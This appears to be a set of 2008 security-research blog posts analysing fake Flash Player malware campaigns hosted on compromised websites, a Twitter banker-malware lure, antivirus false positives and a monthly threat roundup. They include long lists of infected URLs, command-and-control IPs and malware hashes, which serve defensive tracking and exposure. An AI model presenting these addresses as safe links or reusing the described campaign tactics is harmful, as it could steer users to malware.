Compromised Web Servers Serving Fake Flash Players

The tactic of abusing web servers whose vulnerable web applications allow a malicious attacker to locally host a malicious campaign is nothing new. In fact, malicious attackers have been building so much confidence in this risk-forwarding process of hosting their campaigns, that they would start actively spamming the links residing within low-profile legitimate sites across the web.



This campaign serving fake flash players is getting so prevalent these days due to the multiple spamming approaches used, that it's hard not to notice it - and expose it. From a strategic perspective, having a legitimate low-profile site -- of course with the obvious exceptions being on purposely registered for malicious purposes within the participating sites -- hosting your malicious campaign is pretty creative in terms of forwarding the responsibility, and the eventual blocking of a legitimate site to the its owner. As far as the owner's are concerned, it appears that some of them are already seeing the malware page popping-up on the top of their daily traffic stats, and have taken measures to remove it.



Moreover, Adobe's Product Security Incident Response Team (PSIRT) issued a warning notice about the attack yesterday, which could come handy if the attackers weren't taking advantage of client-side vulnerabilities, putting the unware end user is a situation where he wouldn't even receive a download dialog :



"We have seen coverage from the security community of a worm on popular social networking sites that is using social engineering lures to get users to install a piece of malware. According to the reports, the worm posts comments on these sites that include links to a fake site. If the link is followed, users are told they need to update their Flash Player. The installer, posted on a malicious site, of course installs malware instead of Flash Player.We’d like to take this opportunity to reiterate the importance of validating installers and updates before installing them. First off, do not download Flash Player from a site other than adobe.com – you can find the link for downloading Flash Player here. This goes for any piece of software (Reader, Windows Media Player, Quicktime, etc.) – if you get a notice to update, it’s not a bad idea to go directly to the site of the software vendor and download the update directly from the source. If the download is from an unfamiliar URL or an IP address, you should be suspicious."



The structure of the malware campaign is pretty static, with several exceptions where they also take advange of client-side vulnerabilities (Real player exploit) attempting to automatically deliver the fake flash update or player depending on the campaign. On each and every site, there are dnd.js and master.js scripts shich serve the rogue download window, and another .html file, where an IFRAME attempts to access the traffic management command and control, in a random URL it was 207.10.234.217/cgi-bin/index.cgi?user200. A sample list of participating URLs, most of which are still active and running :

joseantoniobaltanas .com

automoviliaria .es/hotnews.html

risasnc .it/fresh.html

carpe-diem .com.mx/fresh.html

kotilogullari .com.tr/hotnews.html

ferrariclubpesaro .it/hotnews.html

imobiliariacom .com.br/default.html

misoares .com

osniehus .de/fresh.html

mydirecttube .com/1/5098/

madosma .com/default.html

tutotic .com/checkit.html

veit-team .si/default.html

antigewaltkurse .de/stream.html

kwhgs .ca/topnews.html

vorgo .com/stream.html

ankaraspor .com.tr/default.html

xxxdnn0314 .locaweb.com.br/watchit.html

ossuzio .com/watchit.html

cit-inc .net/default.html

negocioindependiente .biz/default.html

ambermarketing .com/topnews.html

web27 .login-7.loginserver.ch/stream.html

moretewebdesign .br-web.com/stream.html

omdconsulting .es/topnews.html

parapendiolestreghe .it/hotnews.html

campodifiori .it/topnews.html

212.50.55.81 /stream.html

logisigns .net/fresh.html

intimaescorts .com/default.html

ghioautotre .it/live.html

geckert .de/stream.html

yuricardinali .com/watchit.html

retder .com/fresh.html

valdaran .es/default.html

getadultaccess .com/movie/?aff=5274

bauelemente-giering .de/stream.html

newyork-hebergement .com/watchit.html

allevatoritrotto .it/live.html

exoss2 .com/hotnews.html

soundandlightkaraoke .com/stream.html

land-kan .com/stream.html

grimaldi.nexenservices .com/watchit.html

inconstancia .com.br/watchit.html

gretelstudio .com/stream.html

sumacyl .com/watchit.html

mysna .net/fresh.html

gimnasioyx .com.ar/watchit.html

lagalbana .com/watchit.html

bielizna.tgory .pl/topnews.html

bcs92.imingo .net/stream.html

lapiramidecoslada .es/topnews.html

raulortega .com/stream.html

go-art-morelli .de/hotnews.html

wowhard.baewha .ac.kr/watchit.html

dianagraf .es/default.html

komma10-thueringen .de/hotnews.html

miavassilev .com/stream.html

swampgiants .com/watchit.html

compagniedephalsbourg .com/fresh.html

arla-rc .net/hotnews.html

salacopernico .es/watchit.html

drfinster .de/checkit.html

healthylifehypnotherapy .com/stream.html

ecotrike-bg .com/fresh.html

paoepalavra .org/watchit.html

jureplaninc-sp .com/topnews.html

fichte-lintfort .de/default.html

hergert-band .de/checkit.html

izliyorum .org/topnews.html

lideka .com/stream.html

athena-digitaldesign .com.tw/hotnews.html

e-paso .pl/stream.html

colombeblanche .org/stream.html

teatromalasa .es/watchit.html

mesporte.digiweb.com .br/stream.html

bistrodavila.com .br/watchit.html

hausfeld-solar .de/topnews.html

nakedinbed.co .uk/topnews.html

csr.imb .br/stream.html

herion-architekten .de/default.html

jbhumet .com/default.html

gruppouni .com/hotnews.html

francex .net/fresh.html

galvatoledo .com/topnews.html

cmeedilizia .eu/topnews.html

kroenert .name/default.html

textilhogarnovadecor .com/topnews.html

keithcrook .com/stream.html

elpatiodejesusmaria .com/checkit.html

neticon .pl/hotnews.html

malerbetrieb-pelzer .de/hotnews.html

easterstreet .de/fresh.html

piogiovannini .com.ar/watchit.html

ser-all .com/topnews.html

petzold-dieter .de/checkit.html

beatmung-brandenburg .de/checkit.html

ossuzio .com/watchit.html

teatromalasa .es/watchit.html

vuelosultimahora .com/topnews.html

zelenaratolest .cz/pornotube/index1.htm

ambulatoriovirtuale .it/topnews.html

10a3 .ru/index1.php

izliyorum .org/topnews.html

collectedthoughts .co.uk/index12.html

afg .es/topnews.html

albertruiz .net/topnews.html

bielizna.tgory .pl/topnews.html

blueseven.com .br/topnews.html

bollettinogiuridicosanitario .it/topnews.html

caprilchamonix.com .br/topnews.html

carlolongarini .it/topnews.html

champimousse .com/topnews.html

cheviot.org .nz/topnews.html

contrapie .com/topnews.html

gruppouni .com/topnews.html

hausfeld-solar .de/topnews.html

herbatele .com/topnews.html

houseincostaricaforsale .com/topnews.html

alim.co .il/topnews.html

allevatoritrotto .it/topnews.html

amafe .org/topnews.html

ambulatoriovirtuale .it/topnews.html

atelier-de-loulou .fr/topnews.html

automoviliaria .es/topnews.html

autoreserve .fr/topnews.html

izliyorum .org/topnews.html

jureplaninc-sp .com/topnews.html

kwhgs .ca/topnews.html

lapiramidecoslada .es/topnews.html

last-minute-reisen-4u .de/topnews.html

marcadina .fr/topnews.html

maremax .it/topnews.html

corradiproject .info/topnews.html

dantealighieriasturias .es/topnews.html

deliriuslaspalmas .com/topnews.html

ecchoppers .co.za/topnews.html

elianacaminada .net/topnews.html

fonavistas .com/topnews.html

fraemma .com/topnews.html

fundmyira .com/topnews.html

galvatoledo .com/topnews.html

grafisch-ontwerpburo .nl/topnews.html

markmaverick .com/topnews.html

micela .info/topnews.html

motoclubnosvamos .com/topnews.html

nebottorrella .com/topnews.html

negozistore .it/topnews.html

neticon .pl/topnews.html

norbert-leifheit.gmxhome .de/topnews.html

segelclub-honau .de/topnews.html

snmobilya .com/topnews.html

splashcor .com.br/topnews.html

stephanmager .gmxhome.de/topnews.html

svcanvas .com/topnews.html

tautau.web .simplesnet.pt/topnews.html

textilhogarnovadecor .com/topnews.html

theflorist4u .com/topnews.html

thewindsorhotel .it/topnews.html

vuelosultimahora .com/topnews.html

aliarzani .de/topnews.html

ambermarketing .com/topnews.html

arnold82.gmxhome .de/topnews.html

ocoartefatos.com .br/topnews.html

omdconsulting .es/topnews.html

parapendiolestreghe .it/topnews.html

positive-begegnungen .de/topnews.html

projetsoft .net/topnews.html

rbc.gmxhome .de/topnews.html

beatmung-sachsen .eu/topnews.html

campodifiori .it/topnews.html

clickjava .net/topnews.html

cmeedilizia .eu/topnews.html

dammer .info/topnews.html

embedded-silicon .de/topnews.html

ferrariclubpesaro .it/topnews.html

fgwiese .de/topnews.html

fswash.site .br.com/topnews.html

fytema .es/topnews.html

gildas-saliou. com/topnews.html

go-art-morelli .de/topnews.html

go-siegmund .de/topnews.html

guerrero-tuning .com/topnews.html

gut-barbarastein .de/topnews.html

japansec .com/topnews.html

komma10-thueringen .de/topnews.html

koon-design .de/topnews.html

lanz-volldiesel .de/topnews.html

lauscher-staat .de/topnews.html

losnaranjos.com .es/topnews.html

medical-service-krause .de/topnews.html

nakedinbed.co .uk/topnews.html

nepi.si/topnews .html

radieschenhein. de/topnews.html

residenceflora .it/topnews.html

sabuha .de/topnews.html

ser-all .com/topnews.html

siemieniewicz .de/topnews.html

viajesk .es/topnews.html

allevatoritrotto .it/live.html

bollettinogiuridicosanitario .it/live.html

carlolongarini .it/topnews.html

maremax .it/topnews.html

negozistore .it/topnews.html

parapendiolestreghe .it/live.html

www.donlisander .it/stream.html

aerogenesis .net/watchit.html

allevatoritrotto .it/live.html

atelier-de-loulou .fr/topnews.html

bistrodavila.com .br/watchit.html

bollettinogiuridicosanitario .it/live.html

caprilchamonix.com .br/topnews.html

cheviot.org .nz/live.html

condorautocenter .com.br/watchit.html

dantealighieriasturias .es/live.html

ecchoppers .co.za/topnews.html

elianacaminada .net/live.html

fonavistas .com/topnews.html

fundmyira .com/topnews.html

g6esporte .com.br/stream.html

grafisch-ontwerpburo .nl/topnews.html

gretelstudio .com/stream.html

gutierrezymoralo .com/watchit.html

healthylifehypnotherapy .com/stream.html

herbatele .com/live.html

jureplaninc-sp .com/topnews.html

lacomercialsrl .com.ar/stream.html

lagalbana .com/watchit.html

lapuertaestrecha .com.es/watchit.html

marcadina .fr/topnews.html

maremax .it/topnews.html

myadultcube .com/flash//aff=5176

myadultcube .com/flash//aff=5810

myadultcube .com/movie//aff=5155

newyork-hebergement .com/watchit.html

norbert-leifheit.gmxhome .de/topnews.html

omdconsulting .es/topnews.html

oyakatakent46537 .com/stream.html

parapendiolestreghe .it/live.html

regesh. co.il/watchit.html

rikkeroenneberg .dk/watchit.html

s215847279 .onlinehome.fr/stream.html

salacopernico .es/watchit.html

seekzones .com/watchit.html

seicomsl .es/watchit.html

sigma-lux .ro/watchit.html

soundandlightkaraoke .com/stream.html

stephanmager.gmxhome .de/topnews.html

tartuinstituut .ca/watchit.html

teatromalasa .es/watchit.html

vuelosultimahora .com/topnews.html

wowhard.baewha .ac.kr/watchit.html

aliarzani .de/topnews.html

ambermarketing. com/live.html

bilbondo .com/watchit.html

bollettinogiuridicosanitario .it/live.html

colombeblanche .org/stream.html

donlisander .it/stream.html

fgwiese .de/topnews.html

geckert .de/stream.html

helene-taucher .de/watchit.html

lanz-volldiesel .de/topnews.html

mairie-margnylescompiegne .fr/watchit.html

medical-service-krause .de/topnews.html

nakedinbed.co .uk/topnews.html

ossuzio .com/watchit.html

piogiovannini .com.ar/watchit.html

sabuha .de/topnews.html

sumacyl .com/watchit.html

swampgiants .com/watchit.html

xn--glland-3ya .de/stream.html

yuricardinali .com/watchit.html

nepi .si/topnews.html

dammer .info/topnews.html

atelier-de-loulou .fr/topnews.html

galvatoledo .com/topnews.html

allevatoritrotto .it/topnews.html

hausfeld-solar .de/topnews.html

micela .info/topnews.html

bistrodavila .com.br/watchit.html

hausfeld-solar .de/topnews.html

csr.imb .br/stream.html

herion-architekten .de/default.html

gruppouni .com/hotnews.html

galvatoledo .com/topnews.html

kroenert .name/default.html

keithcrook .com/stream.html

elpatiodejesusmaria .com/checkit.html

malerbetrieb-pelzer .de/hotnews.html

dantealighieriasturias .es/topnews.html

oyakatakent46537 .com/stream.html

89.19.29 .13/stream.html

slobodandjakovic .com/fresh.html

cqcs.com .br/stream.html

seekzones .com/watchit.html

pascosa .it/stream.html

caprilchamonix .com.br/topnews.html

positive-begegnungen .de/topnews.html

ferien-urlaub-lastminute .de/default.html

mueggelpark .info/watchit.html

hillner-online .de/fresh.html

guiasaojose .net/default.html

deliriuslaspalmas .com/topnews.html

fraemma .com/topnews.html

morsbaby .net/default.html

vickywhite .com/fresh.html

micela .info/topnews.html

corradiproject .info/topnews.html

liguehavraise .com/live.html

capacitacaoemlideranca .com.br/fresh.html

materialesyacabados .com.mx/stream.html

208.112.7.68 /checkit.html

152.10.1.37 /1.html

carlolongarini .it/topnews.html

splashcor.com .br/topnews.html

lobpreisstrasse .org/1.html

motoclubnosvamos .com/hotnews.html

hk-rc.com /1.html

taaf.re /stream.html

dulceysalao .com/default.html

amafe .org/topnews.html

kikoom .net/stream.html

frank-kaul .de/1.html

mgh .es/1.html

frutex .es/1.html

montana-rapp .it/default.html

yesilderekoyu .com/live.html

eppa.com .br/default.html

sport-niederrhein .de/checkit.html

27mai2006 .be/live.html

grupomarket .com/fresh.html

japansec .com/live.html

spera .de/live.html

realadultdvd .com/tds/go.php?sid=2

08c .de/checkit.html

systematik-online .de/1.html

garrano .pt/1.html

directorionacionalcristiano .com.co/default.html

autoreserve .fr/live.html

wwguenther .de/default.html

escuelamontemar .com/default.html

pacer-consultants .com/default.html

venhuis .de/default.html

rampichino .eu/fresh.html

ulrike-sperl .de/stream.html

mydirectcube .com/1/5565/

eleusis .tv/default.html

590candles .com/videos/live.html

tao767 .com/videos/live.html

news1590 .com/videos/live.html

creativ-design-geduhn .de/default.html

704friends .com/videos/live.html

in3089 .com/videos/live.html

textclouds9 .com/videos/live.html

firebomb5 .com/videos/live.html

asb-ov-nauen .de

penz-bauunternehmen .de/default.html

adulttopvids .info

insane-rec .de

scdormello .it/default.html

ttolttol.wo .to/fresh.html

icr-sgiic .es/fresh.html

diezcansecoeducacion .iespana.es

unternehmensberatung-hutter .de/live.html

koon-design .de/topnews.html

alim.co .il/topnews.html

2z.com .br/hotnews.html

guerrero-tuning .com/topnews.html

debeer-webservices .nl/fresh.html

s215847279.onlinehome .fr/stream.html

lauscher-staat .de/topnews.html

crosspointbaptistchurch .org/fresh.html

residenceflora .it/topnews.html

b1.kurumsalkimlik .biz/checkit.html

africaviva.org .br/stream.html

Sample detection rate : flashupdate.exe

Scanners Result: 35/36 (97.23%)

Trojan-Downloader.Win32.Exchanger.hk; Troj/Cbeplay-A

File size: 78848 bytes

MD5...: c81b29a3662b6083e3590939b6793bb8

SHA1..: d513275c276840cb528ce11dd228eae46a74b4b4



The downloader then "phones back home" at 72.9.98.234 port 443 which is responding to the rogue security software AntiSpy Spider (antispyspider.net) :



"AntiSpy Spider is a cutting-edge anti-spyware solution.This revolutionary anti-spyware program was created by the industry's top spyware experts in order to protect your computer and your privacy.html, while ensuring optimal system performance.With the ability to locate, eliminate and prevent the widest range of spyware threats, AntispyStorm is able to offer its users a safe, spyware-free computing experience; and with it's convenient automatic update feature, AntispyStorm ensures continuous up-to-date protection."



Sample detection rate : antispyspider.msi

Scanners Result: 11/35 (31.43%)

FraudTool.Win32.AntiSpySpider.b; 

File size: 1851904 bytes

MD5...: 2f1389e445f65e8a9c1a648b42a23827

SHA1..: e32aa6aa791e98fe6fdef451bd3b8a45bad0acd8



The bottom line - over a thousand domains are participating, with many other apparently joining the party proportionally with the web site owner's actions to get rid of the malware campaign hosted on their servers.



Related posts:

Lazy Summer Days at UkrTeleGroup Ltd

Fake Porn Sites Serving Malware - Part Two

Fake Porn Sites Serving Malware

Underground Multitasking in Action

Fake Celebrity Video Sites Serving Malware

Blackhat SEO Redirects to Malware and Rogue Software

Malicious Doorways Redirecting to Malware

A Portfolio of Fake Video Codecs

Continue reading →

Twitter Malware Campaign Wants to Bank With You

In what appears to be a lone gunman malware campaign -- where the malware spreader even left his email address within the binary - the now down Twitter malware campaign managed to attract only 69 followers before it has shut down, using a trivial approach for launching an XSS worm - Cross-site request forgery (CSRF). More info :

"This week it’s Twitter’s turn to host an attack - one that is targeting both Twitter users and the Internet community at large. In this case it's a malicious Twitter profile twitter.com/[skip]/ with a name that is Portuguese for ‘pretty rabbit’ which has a photo advertising a video with girls posted. 

This profile has obviously been created especially for infecting users, as there is no other data except the photo, which contains the link to the video. If you click on the link, you get a window that shows the progress of an automatic download of a so-called new version of Adobe Flash which is supposedly required to watch the video. You end up with a file labeled Adobe Flash (it’s a fake) on your machine; a technique that is currently very popular."

Let's analyze the campaign before it was shut down. The original Twitter account used twitter.com/video_kelly_key basically included a link to player-video-youtube.sytes.net (204.16.252.98) which was using a URL shortening service fly2.ws/NilOMN3 in order to redirect to the banker malware located at freewebtown.com/construimagens/ Play-video-youtube.kelly-key.com. It's detection rate is as follows :

Scanners Result: 14/36 (38.89%)
Trojan-Spy.Win32.Banker.caw
File size: 88064 bytes
MD5...: 25600af502758ca992b9e7fff3739def
SHA1..: 9262ca501ef388e0fe42c50a3d002ddbd6e254f2

Twitter isn't an exception to the realistic potential for XSS worms though CSRF that could affect each and every Web 2.0 service, which as a matter of fact have all suffered such attempts, namely, Orkut, MySpace (as well as the QuickTime XSS flaw), GaiaOnline, Hi5, and most recently the XSS worm at Justin.tv, demonstrate that trivial vulnerabilities come handy for what's to turn into a major security incident if not taken care of promptly.

Related posts:
XSS The Planet
XSS Vulnerabilities in E-banking Sites
The Current State of Web Application Worms
g0t XSSed?
Web Application Email Harvesting Worm Continue reading →

The Twitter Malware Campaign Wants to Bank With You

In what appears to be a lone gunman malware campaign -- where the malware spreader even left his email address within the binary - the now down Twitter malware campaign managed to attract only 69 followers before it has shut down, using a trivial approach for launching an XSS worm - Cross-site request forgery (CSRF). More info :



"This week it’s Twitter’s turn to host an attack - one that is targeting both Twitter users and the Internet community at large. In this case it's a malicious Twitter profile twitter.com/[skip]/ with a name that is Portuguese for ‘pretty rabbit’ which has a photo advertising a video with girls posted. 



This profile has obviously been created especially for infecting users, as there is no other data except the photo, which contains the link to the video. If you click on the link, you get a window that shows the progress of an automatic download of a so-called new version of Adobe Flash which is supposedly required to watch the video. You end up with a file labeled Adobe Flash (it’s a fake) on your machine; a technique that is currently very popular."

Let's analyze the campaign before it was shut down. The original Twitter account used twitter.com/video_kelly_key basically included a link to player-video-youtube.sytes.net (204.16.252.98) which was using a URL shortening service fly2.ws/NilOMN3 in order to redirect to the banker malware located at freewebtown.com/construimagens/ Play-video-youtube.kelly-key.com. It's detection rate is as follows :



Scanners Result: 14/36 (38.89%)

Trojan-Spy.Win32.Banker.caw

File size: 88064 bytes

MD5...: 25600af502758ca992b9e7fff3739def

SHA1..: 9262ca501ef388e0fe42c50a3d002ddbd6e254f2

Twitter isn't an exception to the realistic potential for XSS worms though CSRF that could affect each and every Web 2.0 service, which as a matter of fact have all suffered such attempts, namely, Orkut, MySpace (as well as the QuickTime XSS flaw), GaiaOnline, Hi5, and most recently the XSS worm at Justin.tv, demonstrate that trivial vulnerabilities come handy for what's to turn into a major security incident if not taken care of promptly.



Related posts:

XSS The Planet

XSS Vulnerabilities in E-banking Sites

The Current State of Web Application Worms

g0t XSSed?

Web Application Email Harvesting Worm Continue reading →

McAfee's Site Advisor Blocking n.runs AG - "for starters"

Following the recent, and now fixed false positive blocking sans.org due to the already considered malicious dshield.org and giac.org it's also interesting to note that n.runs AG (nruns.com), whose research into vulnerabilities in antivirus products received a lot of attention lately, is also flagged as a dangerous site.

Excluding the conspiracy theories, a false positive when your solution is integrated in the second most popular search engine is bad, especially when other automated crawling approaches are successfully detecting the site as a non-malicious one. How come? It's all a matter of how you define malicious activity, and what exactly are you trying to protect your users from.



In this case, Site Advisor seems to be trying to protect the end user from herself, but flagging sites hosting some sort of hacking/pen-testing tool in a clear directory structure, since SiteAdvisor isn't capable of automatically flagging a SQL injected site as a malicious one, the approach it takes for assessing whether or not a specific site is malicious is flawed, namely integrating McAfee's signatures based malware database and flagging a site hosting anything detected as malware as a badware site itself. McAfee's comments:

"Our tests are very accurate," Dowling said. "The frequency of false positives is fewer than one a month. Changes in classifications we make are almost always because sites have changed their behaviour. "The email tests are the ones than have the most false positives. Users can have confidence in our ratings."

There are even more surprising false positives, such as, Hack in the Box security conference, Defcon.org, Zone-H France, Invisiblethings.org, AME Info - Middle East business and financial news and more :

milw0rm.com

hackinthebox.org

defcon.org

hitb.org

invisiblethings.org

zone-h.fr

ussrback.com

ameinfo.com



Take for instance the Hack in the Box security conference, which is considered as the download publisher of a file hosted at packetstormsecurity.org. What's interesting to point out is that just like a huge percentage of already flagged as potentially harmful sites that haven't been re-checked in months, with Hack in the Box's case the link was last checked in February, 2008. And since hitb.org is now distributing spyware, any site that it links to is also flagged as badware, like hackinthebox.org itself :



"When we tested this site we found links to hitb.org, which we found to be a distributor of downloads some people consider adware, spyware or other potentially unwanted programs.'



These sites aren't SQL injected, IFRAME-ed or embedded with malware whatsoever, so it's like flagging a gun store as a malicious store because of the inventory there - wrong generalization aiming to bring order into the underground chaos at the first place is prone to result in lots of false positives, a wrong mentality that certain countries are starting to embrace.

The bottom line - is the "do not visit unknown or potentially harmful sites" security tip on the verge of extinction? Probably, as these days, exploited legitimate sites are hosting or redirecting to more malware than potentially harmful sites are. Continue reading →

Summarizing July's Threatscape

July's threatscape -- consider going through June's summary as well -- once again demonstrated that nothing is impossible, the impossible just takes a little longer where the incentive would be the ultimate monetization of the process.



Russian hacktivists attacking Lithuania and Georgia, several Storm Worm campaigns, a couple of new malware tools, Neosploit team abandoning support for their web malware exploitation kit, CAPTCHA for several of the most popular free email providers getting efficiently attacked in order to resell the bogus accounts registered in the process, several copycat SQL injects next to the evasion techniques applied by the copycats, botnets continuing to commit click fraud and generate revenue for those who own or have rented them, an infamous money mule recruitment service taking advantage of the fast-fluxed network provided by the ASProx botnet - pretty interesting month indeed.



01. Decrypting and Restoring GPcode Encrypted Files -

The GPcode authors read the news too, and are catching up with the major weaknesses pointed out in their previous release in order to come with a virtually unbreakable algorithm. And since more evidence of who's behind the GPcode ransomware was gathered, vendors and independent researchers realized that the latest release is also susceptible to a plain simple flaw, namely the encrypted files were basically getting deleting and not securely erased making them fairly easy to recover.



02. Chinese Bloggers Bypassing Censorship by Blogging Backward -

When you know how it works, you can either improve, abuse or destroy it in that very particular order. Chinese bloggers are always very adaptive in respect to spreading their message by obfuscating their messages in a way that common keywords filtering software wouldn't be able to pick them.



03. Gmail, Yahoo and Hotmail’s CAPTCHA Broken -

This has been an urban legend for a while, but with more services starting to offer hundreds of thousands of pre-registered accounts at these providers, it's surprising that spam and phishing emails coming from legitimate email providers is increasing. The "vendors" behind these propositions are naturally starting to "vertically integrate" by offering value-added services for extra payments, namely, scripts to automatically abuse the pre-registered accounts for automatic registration of splogs and anything else malicious or blackhat SEO related.



04. The Antivirus Industry in 2008 -

If it were anyone else but a security vendor to come up with such a realistic cartoon aiming to stimulate innovation by emphasizing on how prolific and sophisticated malware groups have become, it would have been a biased cartoon. However, this one is courtesy of a security vendor, and it's pretty objective.



05. Lithuania Attacked by Russian Hacktivists, 300 Sites Defaced -

This attack is a good example of a decent PSYOPS operation. Of course they have already build the capabilities to deface and even execute DDoS attacks against Lithuania, so why not put them in a "stay tuned" mode, by speculating on the upcoming attack and then executing it making it look like they delived what they've promised? This a lone gunman mass defacement given that the sites were all hosted on a single ISP, with no indication of any kind of coordination whatsoever. The same for the Georgia President’s web site which was under DDoS attack from Russian hackers later this month. Despite that the hacktivists behind it dedicated a separate C&C for the attack, one that hasn't been used in any type of previous attacks so far, they did a minor mistake by using a secondary command and control location that's known to have been connected with a particular "botnet on demand" service in the past. The second attack once again proves that you don't need to build capacity when you can basically outsource the process to someone else.



06. The ICANN Responds to the DNS Hijacking, Its Blog Under Attack -

The ICANN finally issued a statement concerning the DNS hijacking of some of their domains, which is in fact what Comcast.net and Photobucket.com should have done as well, next to stating it was a "glitch". The ICANN also took advantage of the moment and also pointed out that their blog has also been under attack during the month. There's no better example of how the combination of tactics can result in the hijacking of the domains of the organizations implementing procedures aiming to protect against these very same attacks. And while Photobucket.com remained silent during the entire incident, the hosting provider that was used by the Netdevilz team in the two attacks, since they were also responsible for the ICANN and IANA DNS hijackings, technological and social engineeringissued a statement.



07. The Risks of Outdated Situational Awareness -

Security vendors are often in a "catch-up mode" and if I were an average Internet user not knowing that real-time situational awareness speaks for the degree to which my vendor knows what going on online, I'd be pretty excited. However, I'm not. Prevx were catching up with a service which I covered approximately two months ago, I even had the chance to constructively confront with one of the affected sites on how despite their security measures in place, this attack was still possible. Recently Prevx have once again demonstrated an outdated situational awareness by coming across a banking malware in July 2008, whereas the malware has been around since July 2007, and earlier depending on which version you're referring to.



08. Fake Porn Sites Serving Malware - Part Two -

Yet another domain portfolio of fake porn sites serving rogue codecs and live exploit URLs, just the tip of the iceberg as usual, however their centralization is greatly assisting in tracking them down.



09. Storm Worm's U.S Invasion of Iran Campaign -

Stormy Wormy is once again making the headlines with their ability to actually make up the headlines on their own.



10. Mobile Malware Scam iSexPlayer Wants Your Money -

The best scams are the ones to which you've personally agreed to be scammed with without even knowing it. Like this one, which was tracked down and analyzed a couple of hours once a uset tipped on it.



11. The Template-ization of Malware Serving Sites -

The increase of fake porn and celebrity sites is due to the overall template-ization of these, with the people behind them basically implementing several malicious doorways to ensure that the domains get rotated on the fly. Despite that they all look the same, they all sever different type of malware, and zero porn of celebrity content at all except the thumbnails.



12. Violating OPSEC for Increasing the Probability of Malware Infection -

No better way to expose your affiliations and several unknown bad netblocks so far, by adding the netblocks and the malicious domains as trusted sites upon infecting a PC with the malware. Of course, the usual suspects lead the "trusted netblocks".



13. Monetizing Compromised Web Sites -

Several years ago, a script kiddie would install Apache on a mail server, they claim that they defaced it. Today, these amusing situations are replaced by monetization of the compromised sites, by reselling the access to them to blackhat SEO-ers, malware authors, phishers, or personally starting to manage a scammy infrastructure on them, by earning money on an affiliate based model, like this particular attack.



14. Malware and Office Documents Joining Forces -

A recent DIY malware kit, sold as a proprietary tool basically crunching out malware infected office documents, whose built-in obfuscation makes them harder to detect. It will sooner or later leak out, turning into a commodity tool, a process that's been pretty evident for web malware exploitation kits as well.



15. Are Stolen Credit Card Details Getting Cheaper? -

Depends on who you're buying them from, and whether or not they offer discounts on a volume basis, namely the more you buy the cheaper the price of a card is supposed to get. With the current oversupply of stolen credit card details, what used to be an exclusive good once where they could enjoy a higher profit-margin, is today's commodity good.



16. The Neosploit Malware Kit Updated with Snapshot ActiveX Exploit -

Since alll the web malware exploitation kits are open source, and leaked in the wild at large, their modularity allows everyone to easily embed any type of exploit that they want to, resulting in Neosploit's single most beneficial feature, the fact that certain versions include all the publicly available exploits targeting Internet Explorer, Firefox and Opera. Moreover, the open source nature of the kit is resulting in a countless number of modified versions yet to be detected and analyzed, therefore keeping track of the exploits included in a malware kit can only be realistic if you take into considered the exploits that come with the default installation.



17. Obfuscating Fast-fluxed SQL Injected Domains -

Now that's a very good example of different tactics combined to attack, ensure survivability, and apply a certain degree of evasion in between.



18. The Unbreakable CAPTCHA -

There's never been a shortage of ideas, there's always been an issue of usability.



19. The Ayyildiz Turkish Hacking Group VS Everyone -

That's a pretty inspiring mission if you are to ensure your future in the next couple of years, by targeting everyone, everywhere that has ever publicly stated their disagreement with the Turkish foreign policy.



20. Money Mule Recruiters use ASProx's Fast Fluxing Services -

A true multitasking in action with a botnet that's been crunching out phishing emails, SQL injecting and now hosting a well known money mule recruitment service.



21. SQL Injecting Malicious Doorways to Serve Malware -

Constantly switching tactics and combining different ones to achive an objective that used to be accomplished by plain simple techniques, is only starting to take place. In this case, instead of a hard coded SQL injected domain, we have the typical malicious doorways the result of the converging traffic management tools with web malware exploitation kits.



22. Impersonating StopBadware.org to Serve Fake Security Warnings -

Typosquatting popular security vendors and services is nothing new, by having HostFresh providing the hosting for the parked domains promoting the rogue security software, is a privilege and flattery for the success of the Stopbadware initiative.



23. Coding Spyware and Malware for Hire -

Customerization -- not customization -- has been taking place for a while, that's the process of tailoring your upcoming products to the needs of your future customers, compared to the product concept myopia where the malware coder would code something that he believes would be valuable to the potential customers. End user agreements, issuing licenses for the malware tool, as well as forbidding the reverse engineering of the malware so that no remotely exploitable flaws could be, are among the requirements the coder assists on.



24. Lazy Summer Days at UkrTeleGroup Ltd -

Taking a random snapshot of the current malicious activity at a well known provider of hosting services for rogue security applications, live exploit URLs and botnet command&control locations, always provides an insight into what are their customers up to. In this case, centralization of their scammy ecosystem, and parking a countless number of rogue domains on the same server.



25. Email Hacking Going Commercial -

Cybercrime is in fact getting easier to outsource, and while the number of scammers trying to offer non-existent services, or at least services where they cannot deliver the goods, the business model of this service that is that you only pay once they show you a proof that they've managed to hack the email address you game them. How are they doing it? Social engineering and enticing the user to click on live exploit URL from where they'll infect the PC and obtain the email password, of course, next to definitely abusing it for many other purposes in the process.



26. Vulnerabilities in Antivirus Software - Conflict of Interest -

You can easily twist the number of vulnerabilities found in your antivirus solution, but not recognizing them as vulnerabilities at the first place. It's all a matter of what you define as a vulnerability, or perhaps what you admit as a serious vulnerability - remote code execution through a security software, or a flaw that's allowing malware to bypass the security solution itself.



27. Counting the Bullets on the (Malware) Front -

Emphasizing on the number of malware/threats/viruses/worms/slugs your solution detects may be marketable in the short-term, but is damaging the end user's understanding of the threatscape in the long-term. So, by the time he catches up with what exactly is going on, he'll recall the moment in time where he was using the number of threats his solution was detecting as the main benchmark for its usefulness. In reality through, the number is irrelevant from a pro-active point of view, with zero day malware like the one coded for hire undermining the signatures based scanning model.



28. Smells Like a Copycat SQL Injection In the Wild -

It was pretty obvious that copycats seeing the success of SQL injections the the huge number of sites susceptible to exploitation, would also starting taking advantage of the practice. Some are, however, targeting local communities and trying to avoid detection by using targeted SQL injections.



29. Click Fraud, Botnets and Parked Domains - All Inclusive -

The scheme is nothing new, what's new is that the botnet masters are trying to limit the revenues that used to go out to affiliate networks they were participating in, and are trying to own or rent the entire infrastructure on their own.



30. Over 80 percent of Storm Worm Spam Sent by Pharmaceutical Spam Kings -

With access to Storm Worm sold and resold, and new malware introduced on Storm Worm infected hosts used as foundation for the propagation of the new malware in this case, it's questionable whether or not the Storm Worm-ers themselves are sending out the junk emails, or are they people who've rented access to the botnet doing it.



31. Neosploit Team Leaving the IT Underground -

Pretty surprising at the first place, but in reality it clearly demonstrates that when you cannot enforce the end user agreement on your crimeware kit, but continue seeing it used in a very profitable malware operations, you basically shut down the support for the public version. The team is not going to stop innovating for their own purposes, and in the long-term they may in fact re-appear with an updated malware kit that's converging different services next to the product itself.



32. Dissecting a Managed Spamming Service -

Managed spamming services using botnets as the foundation for the campaigns are starting to introduce improved metrics for the delivery, as well as experienced customer support ensuring the spam messages make it through spam filters, or at least increase the probability of making the happen. This is an example of a random service emphasizing on the improved metrics they're capable of delivering.



